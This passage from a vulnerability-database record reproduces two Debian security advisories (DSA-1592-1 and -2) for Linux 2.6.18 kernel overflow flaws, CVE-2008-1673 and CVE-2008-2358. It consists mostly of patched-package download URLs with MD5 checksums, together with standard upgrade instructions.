d0d42ed775b040ea58b57a982f38b68d\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-686_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 16376288 5c199f320eb16c86be18b8d2e32c6415\n http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um-2etch.18etch6_i386.deb\n Size/MD5 checksum: 25587656 f5942271087e736327ca834f0397a632\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 3168052 e3bfd24b076d214cb6d33fc207f4beae\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-686-bigmem_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 16404928 dcdc1f64db1ee1ea8676d8bfebe0cde5\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 3054444 9e19e9507845ddffdafe16c71a745a6c\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-686-bigmem_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 280326 764e6f2292876d3265432d3ed42841aa\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 1326908 ad01885eb378b5bbc95e91940ba6528f\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-k7_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 16467454 75761deb2f7ca6f579ea7b1d9f30bb43\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-486_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 282906 dd1c9ddc9e4b1a7a5ba707e4be0de779\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-k7_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 279142 c9b278c0c863300b40e2ac56a9e57a54\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-686_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 280466 0adad9f9667eeb68e207c9b0c4a526f0\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-686_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 272538 f47880728eb7eab49e58cacb82eae4f4\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-amd64_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 16837250 2d666f0d8999a31ad7384425939c475e\n http://security.debian.org/pool/updates/main/l/linux-2.6/xen-linux-system-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 54188 5063065bf61305f25ce2f0241bac53d5\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-k7_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 16507156 0c629636b5c88deccae2b8f6bc4c0daf\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-486_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 16190498 5f26aa57b5f7d967dc9ae911134a9436\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-i386_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 54250 c6cc42868bc8e8c3a553708afcfdda83\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 54192 dfc36804c4a878bd2e0568fc9df5972c\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 272804 4e2db74286b34fef4bd99c654474eec7\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-xen-686_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 1299784 12eb6454b487ec3ffb3966c6b8597be6\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-vserver-686_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 14290158 9423480b571bf67e17dd61f03d476e7f\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-modules-2.6.18-6-xen-686_2.6.18.dfsg.1-18etch6_i386.deb\n Size/MD5 checksum: 14279510 8d295d68339c7b23dd1a4fe3875098ae\n\nia64 architecture (Intel ia64)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch6_ia64.deb\n Size/MD5 checksum: 3082048 dd4987af955b7af5bb0802afd37a38ec\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-mckinley_2.6.18.dfsg.1-18etch6_ia64.deb\n Size/MD5 checksum: 28181788 c8ad6f07b25695277fd31940249fa717\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-ia64_2.6.18.dfsg.1-18etch6_ia64.deb\n Size/MD5 checksum: 54222 2e2917766865280fb807bce867e49e75\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-itanium_2.6.18.dfsg.1-18etch6_ia64.deb\n Size/MD5 checksum: 255700 2be8b8d91fa1cc8674d43ad6348f8fcc\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-mckinley_2.6.18.dfsg.1-18etch6_ia64.deb\n Size/MD5 checksum: 255646 40c255dd1a9491e28b61afa66c2062cb\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-itanium_2.6.18.dfsg.1-18etch6_ia64.deb\n Size/MD5 checksum: 28013816 a7da365f87b7447cfa45e3e8f77ee413\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch6_ia64.deb\n Size/MD5 checksum: 54204 db7b8e3a94e5150700f75c80067f1e23\n\nmips architecture (MIPS (Big Endian))\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sb1-bcm91250a_2.6.18.dfsg.1-18etch6_mips.deb\n Size/MD5 checksum: 15678050 e86dbf740ac392529c18f1331e5f4ca2\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sb1a-bcm91480b_2.6.18.dfsg.1-18etch6_mips.deb\n Size/MD5 checksum: 15653094 6fcd2afaec51e20c759f97956ad6deb5\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-qemu_2.6.18.dfsg.1-18etch6_mips.deb\n Size/MD5 checksum: 154384 c7d61cfea6e5162f26cab5a536d624c3\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sb1a-bcm91480b_2.6.18.dfsg.1-18etch6_mips.deb\n Size/MD5 checksum: 187446 409a5fb466e0b56793fb5751ef8d2f37\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch6_mips.deb\n Size/MD5 checksum: 54226 e3f3cece2fe1c52ab6f096b9acc9322e\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch6_mips.deb\n Size/MD5 checksum: 3413968 4937a4fed9815d21f3dde1556a1f03b2\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-r5k-ip32_2.6.18.dfsg.1-18etch6_mips.deb\n Size/MD5 checksum: 9075882 ef1a7fec0b442b53e0effb99b45ae553\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-r4k-ip22_2.6.18.dfsg.1-18etch6_mips.deb\n Size/MD5 checksum: 163312 d47154e8a5858ac244d8964265aed5d3\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-r5k-ip32_2.6.18.dfsg.1-18etch6_mips.deb\n Size/MD5 checksum: 167140 2f6330c7fbf831496d241de7afbfe5dc\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sb1-bcm91250a_2.6.18.dfsg.1-18etch6_mips.deb\n Size/MD5 checksum: 187182 365cc18336f0028d5c61f7e36872dbaa\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-r4k-ip22_2.6.18.dfsg.1-18etch6_mips.deb\n Size/MD5 checksum: 8309624 9ced8ea53c844299ee4849381c3fb60f\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-qemu_2.6.18.dfsg.1-18etch6_mips.deb\n Size/MD5 checksum: 6125718 0d0162b98625a15c553598980d5e8f45\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-mips_2.6.18.dfsg.1-18etch6_mips.deb\n Size/MD5 checksum: 54280 16bef3ba6934982b845207616d50004b\n\nmipsel architecture (MIPS (Little Endian))\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-mipsel_2.6.18.dfsg.1-18etch6_mipsel.deb\n Size/MD5 checksum: 54260 842a8522d42c84b5bef09705993b1286\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sb1-bcm91250a_2.6.18.dfsg.1-18etch6_mipsel.deb\n Size/MD5 checksum: 15053846 41c4b49fadf52bf007aa3e47901d6b70\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-qemu_2.6.18.dfsg.1-18etch6_mipsel.deb\n Size/MD5 checksum: 150144 c76ea85061884f0c7ce7837b041ec48a\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-r3k-kn02_2.6.18.dfsg.1-18etch6_mipsel.deb\n Size/MD5 checksum: 155904 fe54dd8780101cdd078eac19b206c7bf\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-r5k-cobalt_2.6.18.dfsg.1-18etch6_mipsel.deb\n Size/MD5 checksum: 9863458 2785b46955e0be4b74a25cf51612ac46\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sb1a-bcm91480b_2.6.18.dfsg.1-18etch6_mipsel.deb\n Size/MD5 checksum: 182734 e6f448b8aa684eba0516084d76462896\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-r5k-cobalt_2.6.18.dfsg.1-18etch6_mipsel.deb\n Size/MD5 checksum: 178382 1eb0fec5eff253135289d56d8bbcf89d\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch6_mipsel.deb\n Size/MD5 checksum: 3350216 a9805a7eabc4718f9e782ac12580521c\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch6_mipsel.deb\n Size/MD5 checksum: 54202 cd006d15b2ecc1e18e99c4ed4b2875da\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sb1a-bcm91480b_2.6.18.dfsg.1-18etch6_mipsel.deb\n Size/MD5 checksum: 15030328 7606ef7e2e818d931b64525aceb6f2d0\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-r3k-kn02_2.6.18.dfsg.1-18etch6_mipsel.deb\n Size/MD5 checksum: 5942234 99c5846317a7f18593768c7a06ab5ba7\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-r4k-kn04_2.6.18.dfsg.1-18etch6_mipsel.deb\n Size/MD5 checksum: 155958 dfd3e42b45f92ef746c3a17f8da38ee7\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-r4k-kn04_2.6.18.dfsg.1-18etch6_mipsel.deb\n Size/MD5 checksum: 5926800 f7746e3f807d6633088722361ff2c958\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sb1-bcm91250a_2.6.18.dfsg.1-18etch6_mipsel.deb\n Size/MD5 checksum: 182898 7fa9f8ed52bfe77a9edcd07e27e7bdd5\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-qemu_2.6.18.dfsg.1-18etch6_mipsel.deb\n Size/MD5 checksum: 6028296 a96abb54f24a7610569809a4b5e58ab1\n\npowerpc architecture (PowerPC)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-prep_2.6.18.dfsg.1-18etch6_powerpc.deb\n Size/MD5 checksum: 16402774 000923a8f193ab5c87d7233553faa7b0\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-prep_2.6.18.dfsg.1-18etch6_powerpc.deb\n Size/MD5 checksum: 245876 80b2eceadb0647df12bfbf28e8888656\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-powerpc_2.6.18.dfsg.1-18etch6_powerpc.deb\n Size/MD5 checksum: 17016908 0c7d49840f5aab6673233ccba0aa817d\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc-miboot_2.6.18.dfsg.1-18etch6_powerpc.deb\n Size/MD5 checksum: 229544 17e19dff17d07c8a86b2b4619627458c\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc-miboot_2.6.18.dfsg.1-18etch6_powerpc.deb\n Size/MD5 checksum: 15157736 dc163b2b90e72466217578571c93550e\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-powerpc64_2.6.18.dfsg.1-18etch6_powerpc.deb\n Size/MD5 checksum: 18349702 ffc686ae0dd4e89bd582499038847d92\n http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.18etch6_powerpc.deb\n Size/MD5 checksum: 3366920 38e292c789864c61f4ba436c49bda658\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc-smp_2.6.18.dfsg.1-18etch6_powerpc.deb\n Size/MD5 checksum: 16969850 05e77a41c6eb4a53d488bb3942f71a45\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch6_powerpc.deb\n Size/MD5 checksum: 54210 008d62a0a7213fec41db8d6a67cc6407\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc_2.6.18.dfsg.1-18etch6_powerpc.deb\n Size/MD5 checksum: 16626712 e279a0593f97bb0e68864b14180ed332\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-18etch6_powerpc.deb\n Size/MD5 checksum: 3414766 07044ab533e3d329467896746182d3ff\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc64_2.6.18.dfsg.1-18etch6_powerpc.deb\n Size/MD5 checksum: 253518 8a4221c90ebb86af18a3f116b2c9af80\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-powerpc_2.6.18.dfsg.1-18etch6_powerpc.deb\n Size/MD5 checksum: 54258 639108e49a1731d8064e581896e60ec3\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-powerpc64_2.6.18.dfsg.1-18etch6_powerpc.deb\n Size/MD5 checksum: 253484 691581f01279f1e08092759652103360\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc_2.6.18.dfsg.1-18etch6_powerpc.deb\n Size/MD5 checksum: 252244 16a63d2fc927903b51a3d57bacea7ed8\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-powerpc-smp_2.6.18.dfsg.1-18etch6_powerpc.deb\n Size/MD5 checksum: 253016 18a4ddf5d9109921f9ed67f899e92ca4\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-powerpc_2.6.18.dfsg.1-18etch6_powerpc.deb\n Size/MD5 checksum: 252742 aa92fe8c1a292465d4c11686e2c0dc03\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-powerpc64_2.6.18.dfsg.1-18etch6_powerpc.deb\n Size/MD5 checksum: 18294114 d74c3e627fe5c85e457972d235eb461c\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch6_powerpc.deb\n Size/MD5 checksum: 3392500 5f0fe6ea67e0187084b57379a4d235e3\n\ns390 architecture (IBM S/390)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s390-tape_2.6.18.dfsg.1-18etch6_s390.deb\n Size/MD5 checksum: 1439074 e91f5e34f5393a17e1049c74d3ab4ddd\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-18etch6_s390.deb\n Size/MD5 checksum: 2966244 e69cdbdf36efbb3e939e1e13acfd8a44\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s390x_2.6.18.dfsg.1-18etch6_s390.deb\n Size/MD5 checksum: 5620216 fe25a15c42d4eb5764d672a654c19067\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch6_s390.deb\n Size/MD5 checksum: 2943246 833916a36215375f954230c64b5f79ce\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-s390_2.6.18.dfsg.1-18etch6_s390.deb\n Size/MD5 checksum: 5402446 cdddeaf8d4a250048d3d2afa244d2cd2\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-s390_2.6.18.dfsg.1-18etch6_s390.deb\n Size/MD5 checksum: 54226 2296055efbd2a706fc44eebd2d50487c\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-s390x_2.6.18.dfsg.1-18etch6_s390.deb\n Size/MD5 checksum: 144810 024fa002bbe2e57a122f46f866739f66\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-s390_2.6.18.dfsg.1-18etch6_s390.deb\n Size/MD5 checksum: 143520 7cb0b94f4140919e1a985a1d525a9125\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch6_s390.deb\n Size/MD5 checksum: 54200 1c16211c3cf03f335ec4dbbaed090857\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-s390x_2.6.18.dfsg.1-18etch6_s390.deb\n Size/MD5 checksum: 5661724 84651e2bbc564a36d1ac0e65ab910dae\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-s390x_2.6.18.dfsg.1-18etch6_s390.deb\n Size/MD5 checksum: 143926 e6e15f966332bad3dcbbfaae0171c030\n\nsparc architecture (Sun SPARC/UltraSPARC)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sparc32_2.6.18.dfsg.1-18etch6_sparc.deb\n Size/MD5 checksum: 6411478 fb5619337245170a85cc61b5e9adf72a\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-vserver-sparc64_2.6.18.dfsg.1-18etch6_sparc.deb\n Size/MD5 checksum: 10693224 cd6a0ea78630ff737e96097c7b184a87\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch6_sparc.deb\n Size/MD5 checksum: 54210 979d148dca3dfea639cc1a812be72bd3\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6_2.6.18.dfsg.1-18etch6_sparc.deb\n Size/MD5 checksum: 3168314 09434cb6ab51eb601f920f6e2f0f1c02\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sparc32_2.6.18.dfsg.1-18etch6_sparc.deb\n Size/MD5 checksum: 165412 38f1c19c6f5e31aaae71dadbe4e757dc\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sparc64-smp_2.6.18.dfsg.1-18etch6_sparc.deb\n Size/MD5 checksum: 10647766 7c92870e968431b17c88e37f9fcda363\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-sparc64_2.6.18.dfsg.1-18etch6_sparc.deb\n Size/MD5 checksum: 10391668 d3d87df04d14df510ff8ae6e5fdf4324\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-sparc64_2.6.18.dfsg.1-18etch6_sparc.deb\n Size/MD5 checksum: 196126 66c35e907e5c03f640c41edccb3aa58e\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-sparc_2.6.18.dfsg.1-18etch6_sparc.deb\n Size/MD5 checksum: 54236 600f2d0a3982da0b086f7e25c28f2f4f\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sparc64_2.6.18.dfsg.1-18etch6_sparc.deb\n Size/MD5 checksum: 194390 ddb26e2649458cf19ec67fa4036b75ce\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-18etch6_sparc.deb\n Size/MD5 checksum: 3190576 80a7c47d7ef1e55b62d345451753f14e\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-sparc64-smp_2.6.18.dfsg.1-18etch6_sparc.deb\n Size/MD5 checksum: 195328 49223a37f981d8c5498f65b06c90900a\n\n These changes will probably be included in the stable distribution on\n its next update.\n\n- ---------------------------------------------------------------------------------\nFor apt-get: deb http://security.debian.org/ stable/updates main\nFor dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main\nMailing list: debian-security-announce@lists.debian.org\nPackage info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>\n", "edition": 3, "modified": "2008-06-09T17:15:58", "published": "2008-06-09T17:15:58", "id": "DEBIAN:DSA-1592-2:CB6D2", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2008/msg00173.html", "title": "[SECURITY] [DSA 1592-2] New Linux 2.6.18 packages fix overflow conditions", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-11-11T13:21:11", "bulletinFamily": "unix", "cvelist": ["CVE-2008-2358", "CVE-2008-1673"], "description": "- ----------------------------------------------------------------------\nDebian Security Advisory DSA-1592-1 security@debian.org\nhttp://www.debian.org/security/ dann frazier\nJun 09, 2008 http://www.debian.org/security/faq\n- ----------------------------------------------------------------------\n\nPackage : linux-2.6\nVulnerability : heap overflow\nProblem type : local/remote\nDebian-specific: no\nCVE Id(s) : CVE-2008-1673 CVE-2008-2358\n\nTwo vulnerabilities have been discovered in the Linux kernel that may\nlead to a denial of service or arbitrary code execution. The Common\nVulnerabilities and Exposures project identifies the following\nproblems:\n\nCVE-2008-1673\n\n Wei Wang from McAfee reported a potential heap overflow in the\n ASN.1 decode code that is used by the SNMP NAT and CIFS\n subsystem. Exploitation of this issue may lead to arbitrary code\n execution. This issue is not believed to be exploitable with the\n pre-built kernel images provided by Debian, but it might be an\n issue for custom images built from the Debian-provided source\n package.\n\nCVE-2008-2358\n\n Brandon Edwards of McAfee Avert labs discovered an issue in the\n DCCP subsystem. Due to missing feature length checks it is possible\n to cause an overflow they may result in remote arbitrary code\n execution.\n\nFor the stable distribution (etch), this problem has been fixed in\nversion 2.6.18.dfsg.1-18etch6.\n\nThe linux-2.6/mipsel build was not yet available at the time of this\nadvisory. This advisory will be updated when this this build becomes\navailable.\n\nWe recommend that you upgrade your linux-2.6, fai-kernels, and\nuser-mode-linux packages.\n\nUpgrade instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nThe following matrix lists additional source packages that were rebuilt for\ncompatability with or to take advantage of this update:\n\n Debian 4.0 (etch)\n fai-kernels 1.17+etch.18etch6\n user-mode-linux 2.6.18-1um-2etch.18etch6\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\nDebian GNU/Linux 4.0 alias etch\n- -------------------------------\n\nStable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, powerpc, s390 and sparc.\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1-18etch6.diff.gz\n Size/MD5 checksum: 5352776 53665fdbfd435768445f5769815a6f0f\n http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um-2etch.18etch6.dsc\n Size/MD5 checksum: 892 19fedcf7c50efef11cafccae07e0633e\n http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.18etch6.dsc\n Size/MD5 checksum: 740 6d352c2fd23224c19ce6bd5f16e426a2\n http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um-2etch.18etch6.diff.gz\n Size/MD5 checksum: 17450 e69f4b95dd204d627a5f45b1912fb428\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1-18etch6.dsc\n Size/MD5 checksum: 5672 ad355fcc4fd43b811ea42d25e453f07b\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-2.6_2.6.18.dfsg.1.orig.tar.gz\n Size/MD5 checksum: 52225460 6a1ab0948d6b5b453ea0fce0fcc29060\n http://security.debian.org/pool/updates/main/f/fai-kernels/fai-kernels_1.17+etch.18etch6.tar.gz\n Size/MD5 checksum: 55758 da75950eb5b906da82a0eb14e3df0a24\n http://security.debian.org/pool/updates/main/u/user-mode-linux/user-mode-linux_2.6.18-1um.orig.tar.gz\n Size/MD5 checksum: 14435 4d10c30313e11a24621f7218c31f3582\n\nArchitecture independent packages:\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-support-2.6.18-6_2.6.18.dfsg.1-18etch6_all.deb\n Size/MD5 checksum: 3718034 4a0772868c474a21d84a5759109fead8\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-manual-2.6.18_2.6.18.dfsg.1-18etch6_all.deb\n Size/MD5 checksum: 1084558 3339b6103ae3d4b978a2f793b6c7b4a4\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-source-2.6.18_2.6.18.dfsg.1-18etch6_all.deb\n Size/MD5 checksum: 41461134 0b1d8c9944f19c4ab4fe6ba26149724d\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-tree-2.6.18_2.6.18.dfsg.1-18etch6_all.deb\n Size/MD5 checksum: 54744 21d56790fe466ad9835168c4200fc83d\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-doc-2.6.18_2.6.18.dfsg.1-18etch6_all.deb\n Size/MD5 checksum: 3589420 9b6d24f908606a6fb80d6ba6d5b162fd\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-patch-debian-2.6.18_2.6.18.dfsg.1-18etch6_all.deb\n Size/MD5 checksum: 1594648 f724461b4b1556f3c95b76bd641d19a0\n\nalpha architecture (DEC Alpha)\n\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver-alpha_2.6.18.dfsg.1-18etch6_alpha.deb\n Size/MD5 checksum: 268958 9226e8f3bd1abe6e1f46d83cb3f15c3e\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-vserver_2.6.18.dfsg.1-18etch6_alpha.deb\n Size/MD5 checksum: 3052824 0a5d73bd0f62988679f1523345a479a1\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-alpha-generic_2.6.18.dfsg.1-18etch6_alpha.deb\n Size/MD5 checksum: 23484706 b3235616663a3f8c5cd74be1971b0426\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all_2.6.18.dfsg.1-18etch6_alpha.deb\n Size/MD5 checksum: 54198 7ad2915af786942a1a198eb5c6d87c81\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-alpha-generic_2.6.18.dfsg.1-18etch6_alpha.deb\n Size/MD5 checksum: 269130 49ffe80d6a37500df13cbb6f354843a8\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-alpha-legacy_2.6.18.dfsg.1-18etch6_alpha.deb\n Size/MD5 checksum: 23463240 395dade71f4add94b3ce97ae3cbb8bdd\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-alpha-smp_2.6.18.dfsg.1-18etch6_alpha.deb\n Size/MD5 checksum: 267564 2743efe9dec46be47c98cdcad485862a\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-all-alpha_2.6.18.dfsg.1-18etch6_alpha.deb\n Size/MD5 checksum: 54234 5a14d927da54bc3f8b2b7c9aeb9fab08\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-headers-2.6.18-6-alpha-legacy_2.6.18.dfsg.1-18etch6_alpha.deb\n Size/MD5 checksum: 268502 2b7595f2a27c437625fbae0f812e8d61\n http://security.debian.org/pool/updates/main/l/linux-2.6/linux-image-2.6.18-6-alpha-smp_2.6.18.dfsg.1-18etch6_alpha.deb\n Size/MD5 checksum: 23845706 5561732b0f11d84d3b8e46f02e3975e6\n 